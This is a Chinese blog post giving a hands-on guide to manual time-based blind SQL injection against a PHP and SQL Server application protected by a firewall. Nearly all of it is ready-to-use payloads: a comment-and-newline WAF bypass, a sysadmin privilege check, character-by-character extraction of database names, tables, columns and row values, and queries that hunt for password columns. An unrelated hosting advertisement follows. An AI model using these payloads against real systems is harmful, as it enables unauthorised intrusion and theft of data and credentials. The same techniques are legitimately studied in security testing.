2个月前 (09-13)  SQL Server    抢沙发
文章评分 2 次,平均分 4.5

假设存在一个PHP+SQL SERVER的环境,存在POST注入,只能进行延时盲注,存在防火墙,Sqlmap能够绕过,但不能注入,手工注入语句如下:

0x1:判断是否存在注入:

#inject为注入点,--OwlXXpFshm%0A绕过WAF,替换空格为注释+回车
#如果存在注入,返回的数据包将延时5秒以上
inject';WAITFOR--OwlXXpFshm%0ADELAY--OwlXXpFshm%0A'0:0:5'--

0x2:判断权限:

#如果是sysadmin权限,则延时5秒
inject';if ( select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

0x3:查询当前数据库的长度和名字

#'>'二分法查询长度
inject';if(len(db_name()))>40 WAITFOR DELAY '0:0:5'--
#查询数据库名字
#substring截取字符串的位置,用ascii转为数字进行二分法查询
inject';if(ascii(substring(db_name(),1,1)))>40 WAITFOR DELAY '0:0:5'--

0x4:查询数据库的版本

inject';if(ascii(substring((select @@version),22,1))=50 WAITFOR DELAY '0:0:5'--

0x5:查询表个数

select count(*) from SysObjects where xtype='u' #查询表个数
inject';if((select count(*) from SysObjects where xtype='u')>15) WAITFOR DELAY '0:0:5'--

0x6查询第一个表的长度

select top 1 name from SysObjects where xtype='u'#查询第一个表
(select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u')#查询结果为1
and len(name)=9#利用and,进行判断,9为表长度的猜测
inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)=9)=1) WAITFOR DELAY '0:0:5'--

0x7查询第一个表的表名

inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and ascii(substring(name,1,1))>90)=1) WAITFOR DELAY '0:0:5'--

0x8查询第二个表的长度

select top 1 name from SysObjects where xtype='u' and name not in ('TB1')#查询第一个表名,去除TB1,TB1为第一个表名
#同理,第三个表则 and name not in ('TB2','TB1')
inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u' and name not in ('TB1')) and len(name)>1)<>0) WAITFOR DELAY '0:0:5'-

0x9查询第二个表的名字

inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u' and name not in ('TB1')) and ascii(substring(name,1,1))>1)=1) WAITFOR DELAY '0:0:5'--

0x10查询TB表的字段

#and name not in ('')查询第二个字段的时候可以直接在其中,排除第一个字段名
inject';if((select count(*) from syscolumns where name in (select top 1 name from syscolumns where id = object_id('TB') and name not in ('')) and ascii(substring(name,1,1))>1)<>0) WAITFOR DELAY '0:0:1'--

0x11查询TB表中CL字段的值

#not in 中填入查出的值
inject';if((select count(*) from TB where CL in (select top 1 CL from TB where CL not in ('')) and ascii(substring(CL,1,1))>1)=1) WAITFOR DELAY '0:0:1'--

0x12查字段类型

inject';if((select count(*) from information_schema.columns where data_type in(select top 1 data_type from information_schema.columns where table_name ='TB') and ascii(substring(data_type,1,1))>116)<>0) WAITFOR DELAY '0:0:5'--

0x13其余语句

SELECT Name FROM Master..SysDatabases ORDER BY Name#查询所有数据库
SELECT top 1 sb.name FROM syscolumns s JOIN sysobjects sb ON s.id=sb.id WHERE s.name='password'#查询存在password字段的表名
inject';if((select count(*) from sysobjects where name in ((select name from sysobjects where name in (SELECT top 1 sb.name FROM syscolumns s JOIN sysobjects sb ON s.id=sb.id WHERE s.name='password') and ascii(substring(sysobjects.name,1,1))>1)))>0) waitfor delay '0:0:1'--
SELECT top 1 name FROM SysColumns where name like '%pass%'#查询包含pass的字段名
inject';if((select count(*) from SysColumns where name in (SELECT top 1 name FROM SysColumns where name like '%pass%' and ascii(substring(name,1,1))>1))>0) waitfor delay '0:0:1'--

 


//下面这个css和插件后台设置的主题有关系,如果需要换样式,则需要修改以下CSS名称

 

除特别注明外,本站所有文章均为铁匠运维网原创,转载请注明出处来自http://www.tiejiang.org/22272.html

中国互联是江苏邦宁科技有限公司旗下的著名IT服务供应商品牌之一,是国内IDC行业十大之一、企业互联网服务首选品牌。江苏邦宁科技成立于2003年,是国内互联网名称与数字地址服务、云数据中心机房服务的引领者,是行业云计算解决方案、网站智能建设、企业智能办公软件、移动互联网开发的创新者。自成立以来,公司秉承“一切为了客户满意”的核心理念,坚持“国际化、专业化、高端化”的发展思路,坚持“以客户需求为导向、以技术创新为基础、以服务创新为支撑”,先后为国内各级政府、社会服务机构、国内外众多500强企业及中小企业、个人客户提供了专业、高质、优越的互联网应用服务。

发表评论

暂无评论

切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

切换登录

注册

扫一扫二维码分享